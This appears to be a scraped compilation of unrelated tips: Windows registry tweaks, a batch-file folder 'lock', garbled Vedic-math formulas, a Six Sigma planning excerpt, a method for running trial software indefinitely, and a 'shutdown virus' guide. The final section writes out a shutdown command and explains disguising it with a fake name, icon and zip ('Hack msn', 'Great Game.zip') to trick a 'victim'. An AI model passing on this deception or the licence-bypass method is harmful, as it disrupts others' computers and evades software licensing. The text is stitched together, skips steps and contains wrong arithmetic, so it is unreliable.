Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)

First we will add the copy and move options to the right click menu of all FILES.

To enable or disable the administrator account on the welcome screen of Windows XP, click Start, Run and enter REGEDIT. Then Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (note that there is a space in the Windows NT). Right click in the right pane and select New, DWord value. Give the value the same name as the Username on the Welcome Screen (it must match) for the account you wish to hide or show. Procedure :

1. Make a folder on the desktop and name it as “folder”

2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.

3. In the ’save as’ name it as lock.bat and click save ! (Save it on Desktop)

5. In the ’save as’ name it as key.bat and click save ! (Save it on Desktop)

6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !

7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !

8. Lock your folder and hide the key.bat somewhere else on your hard disk !

9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

By addition we get: 68X – 68Y = 204 i.e. X - Y = 3
By subtraction we get: 22X + 22Y = 22 i.e. X + Y = 1

8) “By completion and non-completion”

• To solve quadratic, cuboid type equations.
e.g. X3 - 6 X2 + 11X – 6 = 0
Complete the cube: X3 - 6 X2 + 12X – 8 – X + 2 = 0
(X – 2)3 = (X – 2) Therefore X – 2 = 0, -1 or 1 i.e. X = 2, 1 or 3.

9) “By differential calculus”

• To find roots of quadratic equation.
e.g. X2 – 7X + 12 = 0
Taking first differential equal to √ (b2 – 4ac) we get:
2X – 7 = +√ ((-7)2 – 4x1x12) i.e. X = 3 or 4.

10) “Whatever is less”

• To find the cube of numbers which are nearer to 10 or powers of 10.
e.g. (104)3 = 112 48 64. (Subtract -4 twice from 104 to get 112 Then multiply -4 and -12 to get 48 and then write the cube of 4 i.e. 64.

11) “Individual and whole”

• To solve algebraic equation.
e.g. (X+7)4+(X+5)4=706 Expressing it as sum of two forth powers we get:
(X+7)4+(X+5)4 =54+34 Therefore X+7=+5 and X+5=+3

12) “(Multiply) the remainders by last digit”

• 3, 2, 6, 4, 5, and 1 are the remainders when multiplied by 7 the last digits of the quotients will be: 1, 4, 2, 8, 5 and 7 respectively.
Therefore 1/7 = 0.142857

13“Last and twice the penultimate”

• To multiply by 12. e.g. 412 x 12 = 4944

• To solve the algebraic equations of the following form:

• To multiply by series of 9 say 99, 999 etc. when the number of digits in the multiplicand is less than or equal the number of digits in multiplier. e.g. 8x9=72. 11x99=1089. 231x999=230769

• X3+6 X2 +11X+6 = (X+1)(X+2)(X+3)
1+6+11+6 = (1+1)(1+2)(1+3)
24 = 2x3x4

16) “First differential is equal to sum of the factors”

• Consider: X2 + 3X + 2 = (X+1)(X+2)
Here first differential is 2X + 3 = sum of factors: X+1 and X+2.

Strategizing and Planning The planning stage of a Six Sigma deployment is where you can gain valuable traction. Involvement of top management and alignment of company leadership are critical. With the chief executive's decision to proceed, a corporate-level deployment champion that reports directly to the chief executive should be identified. A set of policies, guidelines and rules must be developed with involvement of the deployment champion, one or more steering committees, and selected corporate departments such as finance, human resources, quality, communications and others.

Determining the current performance levels and setting goals for improvement are accomplished through an On-Site Assessment coupled with a Value Stream Assessment. The On-Site Assessment provides insight to the current directions of the business and the business metrics employed. The Value Stream Assessment provides detailed metric data for the processes within the business for use in aligning resources with projects.

Training Establishing and executing Six Sigma training plans are also critical. Some organizations try to cut costs by training only some members of the project team. Run trial software forever - Method

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate

Problems with this hack

Although this hack works on most of the softwares but still there are some software on which this hack wont work

1.This will not work for antivirus since the antivirus needs to be run in the background all the time.RunAsDate cannot be used with any antivirus.

2.This will not work for softwares that require autorun on startup. But works on most of the softwares…

3.you cannot run a software that has a limited number of execution with this hack.

4.You cannot run a keylogger with this hack

ShutDown Computer

1) Right click on desktop, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" or anything of your choice

The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

After you have given it a name click on finish.
You should now have an icon on your desktop that is called "Hack msn" or whatever name you gave it.
It is also advised you change the icon to something different,So the victim fall for it.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don't forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone to shutdown their pc while chatting

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it yourself.

Ok go to start, run type cmd, then in cmd type: shutdown -a.
